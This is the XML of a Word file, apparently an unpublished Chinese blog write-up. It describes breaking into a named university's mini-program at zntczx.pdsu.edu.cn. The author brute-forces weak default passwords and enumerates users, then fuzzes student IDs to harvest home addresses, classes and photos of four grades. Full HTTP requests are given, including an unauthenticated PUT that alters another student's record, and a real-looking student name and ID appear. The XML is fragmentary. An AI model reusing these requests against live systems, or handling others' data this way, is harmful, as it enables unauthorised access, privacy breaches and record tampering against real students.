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平顶山学校小程序存在用户爆破，越权</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="5097982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Anonymous\Documents\1G00d\Blog\source\%E6%9C%AA%E5%85%AC%E5%BC%80\%E5%B9%B3%E9%A1%B6%E5%B1%B1%E5%AD%A6%E9%99%A2%E5%B0%8F%E7%A8%8B%E5%BA%8F%E8%B6%8A%E6%9D%83\image-2024121721003445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个人登录，发现默认密码是账号</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="5018721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Anonymous\Documents\1G00d\Blog\source\%E6%9C%AA%E5%85%AC%E5%BC%80\%E5%B9%B3%E9%A1%B6%E5%B1%B1%E5%AD%A6%E9%99%A2%E5%B0%8F%E7%A8%8B%E5%BA%8F%E8%B6%8A%E6%9D%83\image-202412172101328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随便输入发现也不需要验证码，也会提示是否存在用户，</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="2917031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Anonymous\Documents\1G00d\Blog\source\%E6%9C%AA%E5%85%AC%E5%BC%80\%E5%B9%B3%E9%A1%B6%E5%B1%B1%E5%AD%A6%E9%99%A2%E5%B0%8F%E7%A8%8B%E5%BA%8F%E8%B6%8A%E6%9D%83\image-2024121721034777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爆破211010001</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">211010001成功弱口令登录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="2917031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Anonymous\Documents\1G00d\Blog\source\%E6%9C%AA%E5%85%AC%E5%BC%80\%E5%B9%B3%E9%A1%B6%E5%B1%B1%E5%AD%A6%E9%99%A2%E5%B0%8F%E7%A8%8B%E5%BA%8F%E8%B6%8A%E6%9D%83\image-202412172105537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后发现一个数据包爆出该学校所有专业和学院</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /ellservice/appUser/app/findUserDept?id=1686736537092c6a18cd689b64f96bed11412012c107d HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Host: zntczx.pdsu.edu.cn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xweb_xhr: 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">role: appUser</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090c11)XWEB/11275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Accept: */*</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Sec-Fetch-Site: cross-site</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Sec-Fetch-Mode: cors</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Sec-Fetch-Dest: empty</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Referer: https://servicewechat.com/wx7f0b713955a741c7/14/page-frame.html</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Accept-Encoding: gzip, deflate, br</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Accept-Language: zh-CN,zh;q=0.9</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="2917031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Anonymous\Documents\1G00d\Blog\source\%E6%9C%AA%E5%85%AC%E5%BC%80\%E5%B9%B3%E9%A1%B6%E5%B1%B1%E5%AD%A6%E9%99%A2%E5%B0%8F%E7%A8%8B%E5%BA%8F%E8%B6%8A%E6%9D%83\image-202412172107001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登录成功后发现认证是在studentid上，也不需要再次认证，直接fuzzstudentid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="2917031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Anonymous\Documents\1G00d\Blog\source\%E6%9C%AA%E5%85%AC%E5%BC%80\%E5%B9%B3%E9%A1%B6%E5%B1%B1%E5%AD%A6%E9%99%A2%E5%B0%8F%E7%A8%8B%E5%BA%8F%E8%B6%8A%E6%9D%83\image-202412172107337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6857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Anonymous\Documents\1G00d\Blog\source\%E6%9C%AA%E5%85%AC%E5%BC%80\%E5%B9%B3%E9%A1%B6%E5%B1%B1%E5%AD%A6%E9%99%A2%E5%B0%8F%E7%A8%8B%E5%BA%8F%E8%B6%8A%E6%9D%83\image-202412172102225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一共得到该学校21</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 22 23 24 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">4个年级的学生信息，包括家庭住址、班级、个人照片,该校在校生2万余人。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在修改个人信息处存在越权,不需要token鉴权，直接修改studentid和studentcode就可以修改</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="2917031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Anonymous\Documents\1G00d\Blog\source\%E6%9C%AA%E5%85%AC%E5%BC%80\%E5%B9%B3%E9%A1%B6%E5%B1%B1%E5%AD%A6%E9%99%A2%E5%B0%8F%E7%A8%8B%E5%BA%8F%E8%B6%8A%E6%9D%83\image-202412172121172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UT /ellservice/physical/updateUser HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Host: zntczx.pdsu.edu.cn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xweb_xhr: 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">role: appUser</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090c11)XWEB/11275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Accept: */*</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Sec-Fetch-Site: cross-site</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Sec-Fetch-Mode: cors</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Sec-Fetch-Dest: empty</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Referer: https://servicewechat.com/wx7f0b713955a741c7/14/page-frame.html</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Accept-Encoding: gzip, deflate, br</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Accept-Language: zh-CN,zh;q=0.9</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Length: 195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Name": </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">"马亚阳",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  "studentId": "221070016",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  "studentCode": "221070016",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  "ethnic": "1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  "homeAddress": </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">"在你心里",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  "id": "1686736544298a1075ec3fc7f4f9d8fb7f2670f1e9bdb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7T13:40:28Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-12-17T13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